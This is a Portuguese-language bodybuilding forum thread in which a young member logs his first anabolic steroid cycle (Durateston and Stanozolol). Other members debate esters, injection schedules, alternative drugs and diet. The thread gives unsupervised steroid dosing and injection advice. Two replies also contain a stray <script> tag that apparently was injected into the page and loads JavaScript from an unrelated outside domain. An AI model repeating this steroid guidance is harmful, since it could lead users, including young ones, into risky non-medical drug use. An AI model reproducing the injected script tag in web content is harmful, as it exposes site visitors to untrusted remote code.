Ir para conteúdo
  • Cadastre-se

1º Ciclo - Dura + Stano Landerlan


Posts Recomendados

E ai pessoal, comecei ontem... semana passada cometi um erro iniciante kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk (não comprei seringas)
enfim, comprei tudo na segunda e deixei no jeito pra ontem.

Apliquei era 17 00 e treinei logo após.

Puta que la merda, a dor é uma filhadaputagem que só, doí pra caralho, mas da pra suportar normalmente. (aplicação no glúteo)

A dor é tipo como de quando vc toma uma porrada no braço com bem no meio (aquelas brincadeiras da escola, "dentim de leite") kk

Me senti animado hoje, acordei mais motivado... estou com 81 kg.

Resultados obviamente ainda nao tive, mas só de lembrar que vc ta hormonizado é outra coisa ahahahhahah


se acompanharem os posts e rolar alguns comentários eu continuo relatando!

Link para o comentário
Compartilhar em outros sites

Publicidade

o ciclo está errado, se estender tanto o stano ( nao sei porque usam tanto essa merd@ ) tem grande chance de ficar sem libido..

dura é o pior ester para primeiro contato.

Não concordo com a sua afirmação. Ela se baseia em quais fatos?

Eu só tenho fatos empiricos, os meus proprios. Meu primeiro ciclo foi de durateston, lá se vão 14 anos que eu fiz o ciclo, eu comprava direto na farmacia, produto com certeza verdadeiro e talz, mas eu obtive um ganho de 11kg! Isso mesmo 11kg sai de 62kg para 73kg. E isso porque fiz muita merda, sem dieta adequada, sem repouso correto, treino muito +- e tpc? Nunca tinha ouvido falar de tpc, cabou o ciclo acabou e vamos que vamos.

Perdi alguma coisa sim, mas mantive mais de 80% dos ganhos, tanto que hoje meu peso normal é 75-76kg.

Enfim vai de cada 1, mas durateston (verdadeiro) é uma droga se que se voce usar certinho vai ter ganhos muito bons no primeiro ciclo.

Link para o comentário
Compartilhar em outros sites

Primeiro que voce é novo demais pra ciclar, tem muito pra crescer natural ainda, mas nao adianta falar rsrs

Já que vai ciclar faria algo mais simples como somente oxandrolona ou com propionato junto, uma por semana, só pra testar a resposta do seu corpo.

Reveja seus conceitos de TPC cara, já existem novas técnicas, medicamentos e protocolos diferentes.

Segundo que não gostei da estrutura, normalmente o stano entra na quarta semana pra voce aproveita a testo bater sozinha. No final do ciclo sua testo ja vai estar no chinelo.

E ainda não sei o porque do stano, eu ja tomei mas nunca mais usarei, merda de droga, zoa colesterol, zoa o eixo, zoa sua testo, zoa articulações (aaaahhh mas é da ganho de massa, FODA-SE, tem droga melhor)

Já que vai usar o stano, esquece essa frescura de 38h em 38h. Manda tsd, no mesmo horario e pronto, muito mimimi.

Cara, cade o carboidrato da sua dieta ? Voce só come ovo ?

Voce é seco cara, pode por 3 refeiçoes de carbo ai, umas 250g de batata doce cada, duvido que vc não ganhe uns 10kg tomando essas drogas mas tem que melhorar a estrutura.


<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Não concordo com a sua afirmação. Ela se baseia em quais fatos?

Eu só tenho fatos empiricos, os meus proprios. Meu primeiro ciclo foi de durateston, lá se vão 14 anos que eu fiz o ciclo, eu comprava direto na farmacia, produto com certeza verdadeiro e talz, mas eu obtive um ganho de 11kg! Isso mesmo 11kg sai de 62kg para 73kg. E isso porque fiz muita merda, sem dieta adequada, sem repouso correto, treino muito +- e tpc? Nunca tinha ouvido falar de tpc, cabou o ciclo acabou e vamos que vamos.

Perdi alguma coisa sim, mas mantive mais de 80% dos ganhos, tanto que hoje meu peso normal é 75-76kg.

Enfim vai de cada 1, mas durateston (verdadeiro) é uma droga se que se voce usar certinho vai ter ganhos muito bons no primeiro ciclo.

Cara, ele disse apenas por relação ao estér ser longo e ainda 4 tipos de testosterona. Pelo garoto ser jovem demais pra usar ele, não que não é bom, que não cresça.

Quis dizer que ele poderia ter utilizado um ester curto, menos agressivo e talvez em menor quantidade ou outras drogas mais brandas, tipo Oxandrolona. Justamente pela idade, quando começa cedo assim, jaja ta viciado e não consegue mais treinar sem e ai começam a surgir os problemas.

Agora vai dizer que só porque vc ganhou 11Kg tomando ela seria a melhor droga ?! Eu ganhei 14Kg tomando Dura, e ai ?! mas eu ja tinha 28 anos de idade, tinha chego no meu limite, testosterona começando a baixar e tals. Vai de cada um.

Editado por rvtz
Link para o comentário
Compartilhar em outros sites

Agora vai dizer que só porque vc ganhou 11Kg tomando ela seria a melhor droga ?! Eu ganhei 14Kg tomando Dura, e ai ?! mas eu ja tinha 28 anos de idade, tinha chego no meu limite, testosterona começando a baixar e tals. Vai de cada um.

Não disse que ela é melhor, aonde voce leu isso? Apenas comentei que parece um senso comum que Dura não é uma boa droga para o primeiro ciclo e eu discordo. Citei os 11kg para mostrar que os ganhos podem sim ser muito bons com Dura no primeiro ciclo.

Os problemas que voce citou extra resultados (dependencia, drogas mais fracas etc) podem ocorrer de toda forma, depois que voce cicla voce precisa ter a cabeça no lugar para entender que é um momento do corpo, do contrario você vai viciar mesmo.

Enfim voce repetiu o que eu disse, vai de cada 1 e se vai de cada 1 não da para afirmar que seria melhor começar com outra droga né?

Acho o ciclo bom, eu concordo contigo, usaria a Stano na terceira ou quarta semana e pararia junto com a Dura. Não faria Stano sem TT não.

Abs

Link para o comentário
Compartilhar em outros sites

mudei o stano, nao sei nem por que eu coloquei aquele jeito, foi mais por vicio de tanto ler a mesma coisa kkk

vou mandar na segunda semana o stano e terminar duas semanas depois da ultima aplicação de dura.

erradooooo

Citei os 11kg para mostrar que os ganhos podem sim ser muito bons com Dura no primeiro ciclo.

quando não indicamos dura não é pelos ganhos e sim pelos colaterais causados pelos 4 picos de esters diferentes..

sacanagem ter que explicar isso hoje em dia ainda...

aprenda uma coisa, vc usou testosterona, se tivesse usado o ester fenilpropionato, enantato, cipionato, ou o que quer que seja, teria os mesmos ganhos e menores chances de colaterais..

abraço.

Link para o comentário
Compartilhar em outros sites

Concordo muito com Stein e com Rvtz!

- Dura não é legal pra primeiro contato mesmo, 4 esters, apenas 1 é mais indicado! (Colaterais mais provaveis como aromatização)

- Novo pra ciclar, da pra crescer puro ainda

- Testo Manda segunda e quinta, e nao terça e quinta!

- Stano, mimimi mesmo, tsd mesma hora, e q se fod...

- Mete Carbo saporra aeeeee

Link para o comentário
Compartilhar em outros sites

mano, fiz as contas com base em um tópico que mandaram aqui no fórum e deu que gasto 4000~4500 kcal diaria

Primeiro que voce é novo demais pra ciclar, tem muito pra crescer natural ainda, mas nao adianta falar rsrs

Já que vai ciclar faria algo mais simples como somente oxandrolona ou com propionato junto, uma por semana, só pra testar a resposta do seu corpo.

Reveja seus conceitos de TPC cara, já existem novas técnicas, medicamentos e protocolos diferentes.

Segundo que não gostei da estrutura, normalmente o stano entra na quarta semana pra voce aproveita a testo bater sozinha. No final do ciclo sua testo ja vai estar no chinelo.

E ainda não sei o porque do stano, eu ja tomei mas nunca mais usarei, merda de droga, zoa colesterol, zoa o eixo, zoa sua testo, zoa articulações (aaaahhh mas é da ganho de massa, FODA-SE, tem droga melhor)

Já que vai usar o stano, esquece essa frescura de 38h em 38h. Manda tsd, no mesmo horario e pronto, muito mimimi.

Cara, cade o carboidrato da sua dieta ? Voce só come ovo ?

Voce é seco cara, pode por 3 refeiçoes de carbo ai, umas 250g de batata doce cada, duvido que vc não ganhe uns 10kg tomando essas drogas mas tem que melhorar a estrutura.

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Cara, ele disse apenas por relação ao estér ser longo e ainda 4 tipos de testosterona. Pelo garoto ser jovem demais pra usar ele, não que não é bom, que não cresça.

Quis dizer que ele poderia ter utilizado um ester curto, menos agressivo e talvez em menor quantidade ou outras drogas mais brandas, tipo Oxandrolona. Justamente pela idade, quando começa cedo assim, jaja ta viciado e não consegue mais treinar sem e ai começam a surgir os problemas.

Agora vai dizer que só porque vc ganhou 11Kg tomando ela seria a melhor droga ?! Eu ganhei 14Kg tomando Dura, e ai ?! mas eu ja tinha 28 anos de idade, tinha chego no meu limite, testosterona começando a baixar e tals. Vai de cada um.

vou mandar o stano tsd eu acho... estou pensando ainda tenho 1/2 semana pra decidir ainda.

vou aumentar o carbo na dieta conforme dito, ou melhor ja aumentei, apenas nao citei aqui

em duas das refeições eu coloquei 250 gr de batata. e no almoço coloquei arroz, macarrao, essas coisas.

Concordo muito com Stein e com Rvtz!

- Dura não é legal pra primeiro contato mesmo, 4 esters, apenas 1 é mais indicado! (Colaterais mais provaveis como aromatização)

- Novo pra ciclar, da pra crescer puro ainda

- Testo Manda segunda e quinta, e nao terça e quinta!

- Stano, mimimi mesmo, tsd mesma hora, e q se fod...

- Mete Carbo saporra aeeeee

novo pra ciclar, beleza, na teoria sim... ganho 1 kg de massa magra a cada 2 meses agora, estabilizei em 80 kg e ta dificil sair, decidi ciclar e pronto!

demoro, vou seguir os concelhos, TESTO

terça e sexta (dia de sexta n tenho facul, posso aplicar e ficar de boa. kk

editei o topic já!

Link para o comentário
Compartilhar em outros sites

vou mandar o stano tsd eu acho... estou pensando ainda tenho 1/2 semana pra decidir ainda.

vou aumentar o carbo na dieta conforme dito, ou melhor ja aumentei, apenas nao citei aqui

em duas das refeições eu coloquei 250 gr de batata. e no almoço coloquei arroz, macarrao, essas coisas.

novo pra ciclar, beleza, na teoria sim... ganho 1 kg de massa magra a cada 2 meses agora, estabilizei em 80 kg e ta dificil sair, decidi ciclar e pronto!

demoro, vou seguir os concelhos, TESTO

terça e sexta (dia de sexta n tenho facul, posso aplicar e ficar de boa. kk

editei o topic já!

Ok

Link para o comentário
Compartilhar em outros sites

Nossa... hoje 12-03, DOIS dias após a aplicação... Não sei se houve algo errado mas acredito que seja normal, ficou tipo uma bola no musculo do gluteo onde foi aplicado ou seja, aplicado no gluteo direito na parte superior direita, ai o inchaço ficou um pouco em baixo pra direita.

DÓI, DÓI muito kkkk, mas não da nada, acho que a frase "NO PAIN NO GAIN" foi criada um dia após a aplicação de algum anabol, e não depois dos treinos UHAUWEHIAU

ainda não vejo efeitos, estava com um começo de gripe e acredito que isso tenha atrapalhado na recuperação da primeira aplicação, repousei bem, me hidratei muito e hoje me sinto melhor... ainda não sei se vou treinar (depende de como meu corpo responder, se eu sentir que estou fadigado não vou, é melhor perder um dia pra recuperação do que ir e fazer um treino merda) pretendo ir as 17:00 fazer (ombro e trapézio).

amanha é dia da segunda agulhada!

OBS* to tomando 2gr diaria de VITAMINA C, e ingerindo bastante fruta devido as vitaminas necessárias.

vamo que vamo.

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
×
×
  • Criar Novo...